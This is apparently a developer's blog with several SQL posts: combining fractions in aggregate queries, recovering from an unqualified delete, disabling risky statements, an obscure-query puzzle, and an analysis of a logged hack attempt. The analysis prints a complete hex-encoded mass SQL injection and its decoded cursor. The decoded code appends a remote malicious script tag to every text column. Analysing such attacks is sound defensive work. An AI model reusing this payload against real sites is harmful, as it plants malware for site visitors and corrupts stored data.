Partial fractions in SQL queries

I never thought my maths training would come in handy again. I was working on a financial report, and one of the requirements was to have a particular calculated value show up. The formula didn’t make sense to me, but it was a business/financial logic requirement, so I just dealt with it.

So here’s the core of the problem (specific values have been changed):

select sum(A)/sum(B) - 0.7 from sometable

where “A” and “B” are columns of the database table “sometable”.

So what’s the problem? That select query won’t run. Or at least it didn’t run on a Sybase database (or was it an SQL Server database?). I’m not saying it ran and returned the wrong value. I mean it didn’t even execute. Just in case you asked, “A” and “B” are numeric data columns so the sum function will work.

I don’t know how I came up with the idea of using partial fractions. Given that only 0.08%* of staff in the entire office building had a maths background, and I probably made up the entire 0.08%, I didn’t have anyone to bounce ideas off of and be told “How about you try using partial fractions on that, Vincent?”

(* a completely made up statistic)

Anyway, I tried using partial fractions, and it worked. Now in partial fractions, you typically deal with decomposing a fraction into 2 or more fractions. Here, we’re combining fractions into 1 fraction. Let me show you.

sum(A)/sum(B) - 0.7
= sum(A)/sum(B) - 7/10
= ( 10*sum(A) - 7*sum(B) ) / ( 10*sum(B) )

If I remember correctly, this (equivalent) SQL query will work:

select ( 10*sum(A) - 7*sum(B) ) / ( 10*sum(B) ) from sometable

I’m not a database expert. If you know why that works but not the original (and more direct) version, leave a comment.

[UPDATE: A commenter told me that complicated maths functions don’t work on aggregates. The sum(A) result is an aggregated result. Apparently sum(A)/sum(B) is too complicated. Oh well…]
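If you want to sanity-check the algebra yourself, here's a minimal sketch using Python's built-in sqlite3 module. SQLite is only a stand-in I picked for illustration (it runs the direct version without complaint, unlike the database I was using), and the table contents are made up. Note the parentheses around the denominator: without them, SQL divides by 10 first and then multiplies by sum(B).

```python
import sqlite3

# In-memory SQLite database standing in for the real one (an assumption for illustration).
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE sometable (A REAL, B REAL)")
conn.executemany(
    "INSERT INTO sometable VALUES (?, ?)",
    [(3.0, 4.0), (5.0, 6.0), (1.0, 10.0)],  # made-up data: sum(A) = 9, sum(B) = 20
)


def scalar(sql):
    """Run a query that returns a single value and return that value."""
    return conn.execute(sql).fetchone()[0]


direct = scalar("SELECT sum(A)/sum(B) - 0.7 FROM sometable")
combined = scalar("SELECT (10*sum(A) - 7*sum(B)) / (10*sum(B)) FROM sometable")
# Without parentheses around the denominator, this means ((...) / 10) * sum(B).
unparenthesised = scalar("SELECT (10*sum(A) - 7*sum(B)) / 10*sum(B) FROM sometable")

print(direct, combined, unparenthesised)
```

The first two values agree (up to floating-point rounding), while the third is wildly different.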

As part of that same programming task, I had to deal with another similar problem:

select 50 * (sum(A)/sum(B) - 0.7) from sometable

That SQL query also didn’t run. So here’s the partial fraction combining process:

50 * (sum(A)/sum(B) - 0.7)
= 50*sum(A)/sum(B) - 35
= ( 50*sum(A) - 35*sum(B) ) / sum(B)
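To convince yourself the two forms really are the same, here's a small sketch that checks the identity with exact rational arithmetic, so floating-point rounding doesn't muddy the comparison. The sample sums are made up, and the function names are just mine for illustration.

```python
from fractions import Fraction


def direct(sum_a, sum_b):
    """50 * (sum(A)/sum(B) - 0.7), computed exactly."""
    return 50 * (Fraction(sum_a, sum_b) - Fraction(7, 10))


def combined(sum_a, sum_b):
    """(50*sum(A) - 35*sum(B)) / sum(B), computed exactly."""
    return Fraction(50 * sum_a - 35 * sum_b, sum_b)


# Made-up (sum(A), sum(B)) pairs.
samples = [(9, 20), (7, 10), (123, 456), (1, 3)]
all_equal = all(direct(a, b) == combined(a, b) for a, b in samples)
print(all_equal)
```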

Alternatives

Now I know there’s another option. I could get sum(A) and sum(B) individually, and then do the required calculation in code (C# code as opposed to database SQL code. I was dealing with ASP.NET then).

After considering my options, I decided to leave all the calculations at the database side. This makes the ASP.NET code “cleaner”. Then I only have to deal with one return value (instead of 2, sum(A) and sum(B)), and I can bind it directly to my database objects for display on the web browser.

Also, there were where (and group-by? Can’t remember…) clauses in the SQL query. I didn’t know whether obtaining sum(A) and sum(B) individually (even in the same query) would affect their values. I decided to play it safe, and just get it all in one resulting value from the same query.
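For what it's worth, here's a rough sketch of the other option, again using Python and SQLite as stand-ins (not the ASP.NET and Sybase/SQL Server setup I actually had). The "region" column and the data are hypothetical, added only so there's something to filter on. In this sketch, both sums come from the same query, so the same where clause applies to both.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
# "region" is a hypothetical column, added only so there is something to filter on.
conn.execute("CREATE TABLE sometable (region TEXT, A REAL, B REAL)")
conn.executemany(
    "INSERT INTO sometable VALUES (?, ?, ?)",
    [("east", 3.0, 4.0), ("east", 5.0, 6.0), ("west", 100.0, 1.0)],
)

# Both aggregates come from one query, so the same WHERE clause filters both.
sum_a, sum_b = conn.execute(
    "SELECT sum(A), sum(B) FROM sometable WHERE region = ?", ("east",)
).fetchone()

# The arithmetic happens in application code; guard against a missing or zero sum(B).
value = sum_a / sum_b - 0.7 if sum_b else None

# The all-in-SQL version, for comparison.
in_sql = conn.execute(
    "SELECT sum(A)/sum(B) - 0.7 FROM sometable WHERE region = ?", ("east",)
).fetchone()[0]

print(value, in_sql)
```

The trade-off is the one described above: two values to carry around in code, versus one value straight from the database.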

I didn’t check for efficiency. It wasn’t an oft-used report, so the query wouldn’t run frequently enough to matter.

But if you’re curious enough to do some tests, go ahead. If you then want to share your results, I’d very much appreciate it too.

Chop off their heads

He looked cautiously around, examining every little detail in the room. Each step he took was slow and calculating. His eyes stared at the space above the floor, as if he could see the passing of his quarry through that very space. Raising his right arm, he negligently rested the head of a blood-stained axe upon his shoulder.

He stood still. A drop of blood dripped from the axe for what seemed an eternity, and splattered the floor. He turned, and light glinted off the axe where it wasn’t bloody. A gasp escaped from the closet. He grinned, and shrugged the axe onto both his hands.

He’s cold-hearted. He’s cruel. He’s a murderer.

[Image: axe on chopping block, by Geoffery Holman]

No, I’m not writing a horror story. That wasn’t quite scary enough. Although what I’m going to tell you is frightening enough… It was a dark and stormy night… uh…

It was some data patching task. I was to delete some data from a table. I entered the SQL statement

delete from ImportantTable

and promptly executed that statement without providing the where clause!

Oh in the name of all that is good! My heart was pounding like I just finished running a marathon. My hands started sweating. I felt a heat spreading from my neck to my head. “What have I done!”

Luckily, I was using TOAD, a user interface for accessing Oracle databases. And in Oracle, as much as I hate it, changes to database tables are not committed until you explicitly say so. There’s a commit button in TOAD. You can also type in “commit” and execute that.

So what I did was roll the changes back, with a handy “rollback” button. Whew…
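Here's a minimal sketch of that rescue, using Python's sqlite3 module as a stand-in for Oracle and TOAD (an assumption for illustration; the table columns and rows are made up). In its default mode, the module opens a transaction implicitly before a delete, so the change stays uncommitted until you say otherwise.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE ImportantTable (code TEXT, description TEXT)")
conn.executemany(
    "INSERT INTO ImportantTable VALUES (?, ?)",
    [("CODE0001", "Very important code"), ("CODE0002", "Another important code")],
)
conn.commit()  # the made-up rows are now committed


def row_count():
    """Return the number of rows currently visible in ImportantTable."""
    return conn.execute("SELECT count(*) FROM ImportantTable").fetchone()[0]


# The mistake: a delete with no where clause. The sqlite3 module (default mode)
# starts a transaction before this statement, so nothing is committed yet.
conn.execute("DELETE FROM ImportantTable")
count_after_delete = row_count()

conn.rollback()  # the equivalent of the "rollback" button
count_after_rollback = row_count()

print(count_after_delete, count_after_rollback)
```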

Like I said before, I prefer any SQL statement I execute to be, you know, really executed. I’ve had experiences where I was debugging my web application and was wondering why the data wasn’t refreshed. The select query using TOAD returned the correct set of data. Why wasn’t the web application doing so too? Because the changes in the database weren’t committed. A waste of 2 hours of my life…

But that’s with Oracle. The other databases aren’t so forgiving. But I like that. Anyway, since then, I’ve been very careful about executing update, insert and delete statements.

Still, that wasn’t enough for my paranoid mind, oh no no no. What if I need to have several statements on screen, and a few of them are updates and deletes? Perhaps you would suggest commenting them out. Well, in Query Analyzer (of SQL Server), you can highlight a statement and execute only the highlighted section. If your highlight leaves out the comment markers (2 dashes, or a /* */ pair), the statement gets executed.

Well, this won’t do at all. So I came up with a fail-safe method; I chopped off the heads of any SQL statement performing “dangerous” operations. So all my “dangerous” statements look like this:

nsert into ImportantTable
values('CODE0001','Very important code')

pdate AnotherImportantTable
set id_desc='An alternative description'
where id_code='IMPT0001'

elete from SuperImportantTable
where price < 500

I add the appropriate leading letter when I'm going to execute the statement. After execution, I lop the leading letter off again. This leaves the statement still on screen so I know what I did. And in the unfortunate event that I accidentally execute the entire statement when I wasn't supposed to, the execution will fail, because the statement isn't properly formed.
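Here's a small sketch of why the trick works, with SQLite (via Python) standing in for whichever database you're on. The table columns and rows are made up. A headless statement gets rejected before it touches any data, and it only becomes dangerous again once the head is put back.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE SuperImportantTable (name TEXT, price REAL)")
conn.executemany(
    "INSERT INTO SuperImportantTable VALUES (?, ?)",
    [("cheap", 100.0), ("pricey", 900.0)],  # made-up rows
)
conn.commit()


def row_count():
    """Return the number of rows currently in SuperImportantTable."""
    return conn.execute("SELECT count(*) FROM SuperImportantTable").fetchone()[0]


headless = "elete from SuperImportantTable where price < 500"

try:
    conn.execute(headless)  # accidental execution of the headless statement
    failed = False
except sqlite3.Error as exc:
    failed = True
    print("Rejected:", exc)

rows_left = row_count()

# Putting the head back on makes it a real statement again.
conn.execute("d" + headless)
rows_after_real_delete = row_count()

print(failed, rows_left, rows_after_real_delete)
```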

So that's my method of handling SQL statements. When in doubt, chop off their heads first.

Hexed SQL – Analysis of a hack attempt

A few days ago, I was browsing through my web site logs. I was scrolling along when I saw an interesting entry (warning: long horizontal scrolling ahead):

/2008/07/15/are-you-malleable-code-editor/?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S)

I thought that looked peculiar, but didn’t think much of it. It wasn’t until the next day that I felt that was a hack attempt. Yeah, my spider sense wasn’t doing very well…

So I took a closer look at it. From the keywords “DECLARE”, “CHAR(4000)”, “SET”, “CAST” and “EXEC”, I gathered this might be an SQL statement. But what’s the long string of characters doing?

Notice the “0x” in the CAST command. Hmm… hexadecimal? To prove this, I wrote a mini program:

// Needs: using System; using System.IO;
StreamWriter sw = new StreamWriter("vince.txt");
string s = "4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72";
// Every pair of hex digits encodes one ASCII character.
for (int i = 0; i + 1 < s.Length; i += 2)
{
    char c = Convert.ToChar(Convert.ToInt32(s.Substring(i, 2), 16));
    sw.Write(c);
}
sw.WriteLine();
sw.Close();

That's probably not the best way to manipulate hexadecimal, so you should definitely not follow this example.
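For comparison, here's a shorter sketch of the same decoding in Python (not what I used at the time). To keep it short, it decodes only the first ten bytes of the payload. It assumes the payload is plain ASCII, which it turned out to be.

```python
# Only the first few bytes of the payload, to keep the example short.
hex_prefix = "4445434C415245204054"

# Two hex digits per byte; the payload is assumed to be plain ASCII.
decoded = bytes.fromhex(hex_prefix).decode("ascii")
print(decoded)  # DECLARE @T
```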

Lo and behold, I got this (reformatted for legibility):

DECLARE @T varchar(255),@C varchar(4000)

DECLARE Table_Cursor CURSOR FOR
select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

OPEN Table_Cursor
FETCH NEXT FROM  Table_Cursor INTO @T,@C

WHILE(@@FETCH_STATUS=0)
BEGIN exec('update ['+@T+'] set ['+@C+']=''"></title><script src="http://somesite.cn/csrss/w.js"></script><!--''+['+@C+'] where '+@C+' not like ''%"></title><script src="http://somesite.cn/csrss/w.js"></script><!--''')
FETCH NEXT FROM  Table_Cursor INTO @T,@C
END

CLOSE Table_Cursor
DEALLOCATE Table_Cursor

It was a chunk of SQL statements in hexadecimal! So, let's look at it more closely. Let's start with this part:

select a.name,b.name from sysobjects a,syscolumns b
where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

sysobjects and syscolumns are system database tables. This automatically rules out Oracle as the database, since Oracle uses all_tables and all_tab_columns. MySQL uses INFORMATION_SCHEMA.TABLES and INFORMATION_SCHEMA.COLUMNS respectively.

That leaves me with Sybase and SQL Server, the other 2 databases that I'm familiar with. Then I saw the query uses xtype. Aha! Sybase's sysobjects table doesn't have the xtype column; it only has the type column!

And so, I deduced that this was probably an attack on web sites running on SQL Servers.

Let's look at the query again. This part a.xtype='u' in the where clause searches for user tables (or tables created by the user or associated applications). This part:

b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167

needs a little more explanation. My digging into the innards of syscolumns tells me that 99, 35, 231 and 167 correspond to ntext, text, nvarchar and varchar respectively.
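If it helps to see that mapping as a lookup table, here's a tiny sketch. The names TEXT_XTYPES and describe are mine, purely for illustration. It also rebuilds the filter from the decoded query out of the table.

```python
# xtype codes from the decoded query, with the type names given above.
TEXT_XTYPES = {99: "ntext", 35: "text", 231: "nvarchar", 167: "varchar"}


def describe(xtype):
    """Return the type name for an xtype code, or a placeholder if it isn't one of the four."""
    return TEXT_XTYPES.get(xtype, "not targeted")


# Rebuild the filter from the decoded query out of the lookup table.
predicate = " or ".join(f"b.xtype={code}" for code in TEXT_XTYPES)
print(predicate)
```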

Hmm... those 4 look familiar... Oh right, they're data types for storing text in databases. I have a theory as to why char and nchar are not included, but let's focus on the query first.

So in English, the query retrieves all columns of text data type of all user-created database tables. Then in the while loop, an update command is executed. Basically, it prepends a "certain value" to all the text columns in all the user-created tables. Let's look at this "certain value" (yes, this is THE HACK), shall we?

THE HACK starts with two single quotes, which become just one single quote because of the SQL escape. Then comes a double quote and a greater-than sign. Huh? Then there's a </title> end tag. This implies there's a starting title tag somewhere.
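The quote-doubling is easier to see in isolation. Here's a minimal sketch, using SQLite through Python as a stand-in (SQL Server follows the same doubling rule for string literals). The column name "col" and the word "hello" are made up.

```python
import sqlite3

conn = sqlite3.connect(":memory:")

# Inside a string literal, two single quotes stand for one literal single quote.
escaped = conn.execute("SELECT 'set [col]=''hello'''").fetchone()[0]
print(escaped)  # set [col]='hello'
```

So the string handed to exec ends up containing an ordinary quoted value, which is what the generated update statement needs.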

From this, I deduce that the hacker is assuming (or hoping) one of those text columns will be used in the title tag. This implies that the text columns are assumed to be of moderate length. char and nchar types are not usually used for these types of data, so they're left out (or the hacker didn't think they're worthy). At least that's my theory...

Moving on, we see that there's a script tag. Isn't there always? *smile* The Javascript file comes from a dubious web site from China, based on the web site address. Yes, I've anonymised it so the actual dubious site's address isn't shown (to prevent giving power to the hacker and to lower the chances of search engines banning me). You're welcome to use the C# code above to decipher the chunk of hexadecimal and find out yourself. But please, don't go to that site!

Now I don't quite understand what's with the where clause in the update statement in the exec command. Why didn't the hacker simply update all the columns instead of adding a where clause search filter? It ends up the same anyway... Perhaps it's to mix up the encoded hexadecimal so it's not similar to past attempts...

Anyway, basically THE HACK updates text columns such that if one of the text columns is used in the title tag, the web page loads the malicious Javascript and ends rendering the rest of the page. I have no idea what the Javascript file will do, and I don't intend to find out. The additional damage is the corruption of the data in the text columns (the original text ends up behind an HTML comment opener), which is probably not as fatal as the Javascript.
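To make that concrete, here's a rough sketch of what happens to a page when an affected column lands in the title tag. It only manipulates strings and never loads anything. The page template and the column value are hypothetical, and the address is the anonymised one from above.

```python
# The anonymised value from the decoded update statement.
payload = '"></title><script src="http://somesite.cn/csrss/w.js"></script><!--'

# Hypothetical column value and page template, made up for illustration.
original_value = "My product page"
infected_value = payload + original_value  # the update prepends the payload
page = f"<html><head><title>{infected_value}</title></head><body>Hello</body></html>"

title_end = page.index("</title>")
script_start = page.index("<script")
comment_start = page.index("<!--")

# The first </title> is the injected one, so the title closes early...
closes_early = title_end < page.index(original_value)
# ...the script tag follows it, and everything after <!-- is commented out,
# because no closing --> ever appears.
hidden = page[comment_start + len("<!--"):]

print(closes_early, script_start > title_end)
print(hidden)
```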

And that's the end of my analysis. I hope that even if it's not relevant to you, you've learnt something from the thought processes that go into this hack investigation.

Please ConvertToEnglish() – Obscure SQL

Sometimes you come across a simple SQL statement. Yet you’re confounded by the reasoning behind it. You think, “What is this trying to do?!”

Never had that experience before? Well, here’s your chance. Here’s a heavily anonymised version:

select max(is_active) from customers where customer_id = 'ABC'

And here’s the accompanying database table named “customers”.

customer_id  customer_name    is_active
ABC          ABC Pte Ltd      N
ABC          ABC Corp         N
ABC          ABC Corporation  Y
PQR          PQR Company      Y
XYZ          XYZ Company      N
XYZ          XYZ MegaCorp     N

Study both the SQL statement and the data in the database table. Then tell me what you think is the business logic behind the SQL statement.

What I mean is, suppose some manager needs some information. And the SQL statement is part of the solution to obtain that information. What does that manager need to know?

Need some help? Here’s an equivalent version:

select min(customer_status) from customers where customer_id = 'ABC'

customer_id  customer_name    customer_status
ABC          ABC Pte Ltd      H
ABC          ABC Corp         H
ABC          ABC Corporation  C
PQR          PQR Company      C
XYZ          XYZ Company      H
XYZ          XYZ MegaCorp     H
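If you'd rather poke at the data than stare at it, here's a minimal sketch that loads both versions into an in-memory SQLite database and runs the two queries for every customer. Putting both columns in one table is my shortcut for illustration, and SQLite is only a stand-in for the real database. It prints the raw results and leaves the interpretation to you.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
# Both versions of the table combined into one, purely for convenience.
conn.execute(
    "CREATE TABLE customers (customer_id TEXT, customer_name TEXT, "
    "is_active TEXT, customer_status TEXT)"
)
conn.executemany(
    "INSERT INTO customers VALUES (?, ?, ?, ?)",
    [
        ("ABC", "ABC Pte Ltd", "N", "H"),
        ("ABC", "ABC Corp", "N", "H"),
        ("ABC", "ABC Corporation", "Y", "C"),
        ("PQR", "PQR Company", "Y", "C"),
        ("XYZ", "XYZ Company", "N", "H"),
        ("XYZ", "XYZ MegaCorp", "N", "H"),
    ],
)


def run(column_expr, customer_id):
    """Run one of the aggregate queries for a single customer_id."""
    # column_expr is a fixed string from this script, never user input.
    sql = f"SELECT {column_expr} FROM customers WHERE customer_id = ?"
    return conn.execute(sql, (customer_id,)).fetchone()[0]


for cid in ("ABC", "PQR", "XYZ"):
    print(cid, run("max(is_active)", cid), run("min(customer_status)", cid))
```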

This entire exercise is to train you to decipher existing logic and data with very little help or documentation.

Bonus points: What do you think the values for the columns “is_active” and “customer_status” stand for?